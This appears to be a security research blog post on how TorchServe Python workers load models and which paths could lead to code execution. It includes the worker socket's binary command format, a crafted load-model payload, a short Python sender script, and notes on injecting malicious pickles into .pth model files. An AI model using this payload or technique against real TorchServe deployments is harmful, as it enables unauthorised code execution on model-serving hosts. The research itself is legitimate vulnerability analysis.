6 min read

TorchServe Workers Code Execution

A dive into how TorchServe workers work and some potential paths for code execution in their context.

This is just some random writing about how TorchServe Workers work. A specific, but heavily caveated path to remote code execution and also some thinkings on how TorchScript pickles can or cannot be used for code execution. When you make a request to the API to load a new model this in-turn triggers a worker. The worker is the component which actually loads and executes the model. By default, the worker is a Python based worker, there is also a C/C++ worker that will run if you have the specific backend compiled.

When launching a model normally, you would send an API call like this:

 curl -X POST "http://localhost:8081/models?url=injected2.mar&initial_workers=1&runtime=python

Before talking about interacting with the worker, lets just take a look at the contents of the mar file since it is important. The contents here are going to be different depending on how built the archive, but here is an example:

.
├── MAR-INF
│   └── MANIFEST.json
├── index_to_name.json
├── model.py
└── squeezenet_injected.pth

2 directories, 4 files

The model.py file contains the handler code, and you can pretty easily put in arbitrary python code you want executed here. The .pth fille is a serialized model file, there are multiple different model formats you can use. The .pth file format is one that is easy to pickle to inject malicious code. This key file here i the MANIFEST.json file, which contains looks like this:

{
  "createdOn": "31/03/2024 15:24:58",
  "runtime": "python",
  "model": {
    "modelName": "injected2",
    "serializedFile": "squeezenet_injected.pth",
    "handler": "image_classifier",
    "modelFile": "model.py",
    "modelVersion": "1.0"
  },
  "archiverVersion": "0.10.0"
}

The values are used as part of model execution, it points to the other files. There are a handful of unique code paths that you can follow if you change the values of these inputs in different ways, which we will talk about later.

TorchServe will take this mar file, which is a zip and then unzip it into a folder under /var. It then goes into the folder and very importatly loads that location into the PYTHONPATH. Once this happens it launches a worker process like below, binding a socket to a port higher than 9000 - incrementing by one for each time a worker process is launched.

 /opt/anaconda3/bin/python /opt/anaconda3/lib/python3.11/site-packages/ts/model_service_worker.py --sock-type tcp --port 9039 --metrics-config /opt/anaconda3/lib/python3.11/site-packages/ts/configs/metrics.yaml

In the event that the runTime API flag is set to LSP instead of the default of python TorchServe will attempt to launch the cpp backend. This launches a command like shown below, this has not been investigated as much.

2024-04-06T17:07:59,607 [DEBUG] W-9000-mnist_base_1.0 org.pytorch.serve.wlm.WorkerLifeCycle - Worker cmdline: [/home/venv/lib/python3.9/site-packages/ts/cpp/bin/model_worker_socket, --sock_type, unix, --sock_name, /tmp/.ts.sock.9000, --runtime_type, LSP, --model_dir, /tmp/models/9e6fe30b95c0409888d1cde1de411726, --metrics_config_path, /home/venv/lib/python3.9/site-packages/ts/configs/metrics.yaml]

During testing, the service worker only seemed to respond to commands when it was not already in use by another connection. This leads to the idea that the stuff mentioend below only works if you interact with a idle worker that has not yet been engaged with.

The Python worker will expose a port to localhost, this port expects a socket connection that contains a binary payload. The binary payload can start with one two inputs:

  • b"I" -> Inference Request
  • b"L" -> Command Request.

For our purposes, we can more about the second one which is the command which will load in a new model. The format of the frame you can find here: https://github.com/pytorch/serve/blob/4f9070802a666cdffc732b07a2b2870af0616d9a/ts/protocol/otf_message_handler.py#L202

"""
MSG Frame Format:

| cmd value |
| int model-name length | model-name value |
| int model-path length | model-path value |
| int batch-size length |
| int handler length | handler value |
| int gpu id |
| bool limitMaxImagePixels |

:param conn:
:return:
"""

The model name value is the name of the model. The model path is important, it is where the service will look to for finding the manifest files. Finally, the handler value is important because it is what is used to perform a import of a python module via importlib. The other values are not important in the context of getting code execution.

The format of the binary payload starts with one of the two command options above. The length of the upcomming input is next, in the form of 4 bytes of hex. The input after that is a value that matches that length.

So for exampke, if the model name is "injected10" that has a length of 10, which is 0xa in hex. Therefore that section would be \x00\x00\x00\x0ainjected10\

Here is an example of a string that would load in the model in /tmp/aaabbbb and a handler of image_classifier

`'L\x00\x00\x00\x0ainjected10\x00\x00\x00\x0d/tmp/aaaabbbb\x00\x00\x00\x01\x00\x00\x00\x10image_classifier\x00\x00\x00\x01\x00\x00\x00\x00\x01`

Here is what the input looks like once decoded by the worker:

{'modelName': bytearray(b'injected10'), 'modelPath': bytearray(b'/tmp/aaaabbbb'), 'batchSize': 1, 'handler': bytearray(b'image_classifier'), 'gpu': 1, 'envelope': bytearray(b''), 'limitMaxImagePixels': True}

The following is a short python scirpt which sends this packet to the endpoint

import socket
import sys

HOST = '127.0.0.1'
PORT = 9039

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((HOST,PORT))

payload = 'L\x00\x00\x00\x0ainjected10\x00\x00\x00\x0d/tmp/fuckthis\x00\x00\x00\x01\x00\x00\x00\x10image_classifier\x00\x00\x00\x01\x00\x00\x00\x00\x01'
payload_str = str.encode(payload)

s.send(payload_str)
response = s.recv(2048)
print(f"Received {response!r}")
s.close()

The hanlder part of this input is very important, the value that is passed here needs to be loaded in as a module

  try:
            module, function_name = self._load_handler_file(handler)
        except ImportError:
            module = self._load_default_handler(handler)
https://github.com/pytorch/serve/blob/8450a2e4bca4edc3397b40bea9dd33595962d06a/ts/model_loader.py#L107C8-L110C57

..
module = importlib.import_module(module_name)
or
module = importlib.import_module(module_name, "ts.torch_handler")

Basically the value you pass here must be loadable directly as a module or be a part of ts.torch_handler otherwise the execution will stop. image_classification is inside of ts.torch_handler here. It is important to understand that the fact that TorchServe adds the extracted folder to the PYTHONPATH` enables this to work normally, but this is a luxury that you may not have if you are trying to exploit this from scratch.

So right here, if you are able to have a malicious module inside python path, and pass in that module into the handler part of this input you can get it trigger, that is unlikely however.

Assuming that this import flow works, it will then continue on two distinct flows.

Scenario 1 - The manifest file references a modelFile

If the MANIFEST.json contains a modelFile the following code will execute

   if model_file:
        logger.debug("Loading eager model")
        self.model = self._load_pickled_model(
            model_dir, model_file, self.model_pt_path
        )
        self.model.to(self.device)
        self.model.eval()
       https://github.com/pytorch/serve/blob/8450a2e4bca4edc3397b40bea9dd33595962d06a/ts/torch_handler/base_handler.py#L90

This code will take the modelFile and attempt to import it. Again if the folder is part of the PYTHONPATH it will properly execute and getting you code execution. However if it is not, it will get you an import error. If you pass in a model file that is unrelated to your MAR file, but is in PYTHONPATH it will load that however there is a check in place to make sure that file only has a single class defenition. If you are able to get past this check then it will load the serialized model that is defined in the model, which can contain a malicious pickle.

To summerize here, if you keep modelFile in the manifest:

  • The value that is in the "handler" section of the manifest needs to be importable via PYTHONPATH.
    • If your malicious code is in PYTHONPATH you can use this to get code execution.
  • If your code is not in PYTHONPATH, you must pass in a module that is in PYTHONPATH and contains only a single class.
    • Once you do you this you get the worker to load in your model with torch.load. If you inject a payload into this module by injecting into the pickle it will execute.

Scenario 2 - The manifest file does not reference a modelFile

If the modelFile parameter is empty the worker will attempt to load the serialziedModelFile directly. The path this follows depends the extension of the model file. It does not appear to be possible to load in a .pth file directly using this flow, which would be easy code execution. It does load TorchScript models however:

elif self.model_pt_path.endswith(".pt"):
            self.model = self._load_torchscript_model(self.model_pt_path)
            self.model.eval()
            
 https://github.com/pytorch/serve/blob/8450a2e4bca4edc3397b40bea9dd33595962d06a/ts/torch_handler/base_handler.py#L90

This unfortunately does not really lead anywhere though. TorchScript models contain pickles but these are not real python pickles. TorchScript defines a serialization protocol that is Python-Like, but is not directly Python. It is described here: https://github.com/pytorch/pytorch/blob/main/torch/csrc/jit/docs/serialization.md

If you attempt to load in a model that has a payload injected into it you will see an error such as this:

import torch
loaded_compiled_model = torch.jit.load('trythis2.pt')

RuntimeError: 
Unknown type name 'builtins.eval':
builtins.eval

This is because there is no eval builtin with TorchScript. You can see what the possible builtints are here: https://pytorch.org/docs/stable/jit_builtin_functions.html

As far as I know, there is not a lot of research about injecting payloads into TorchScript modules with malicio2eeus content. Looking at the builtins, I don't know if it would be possible.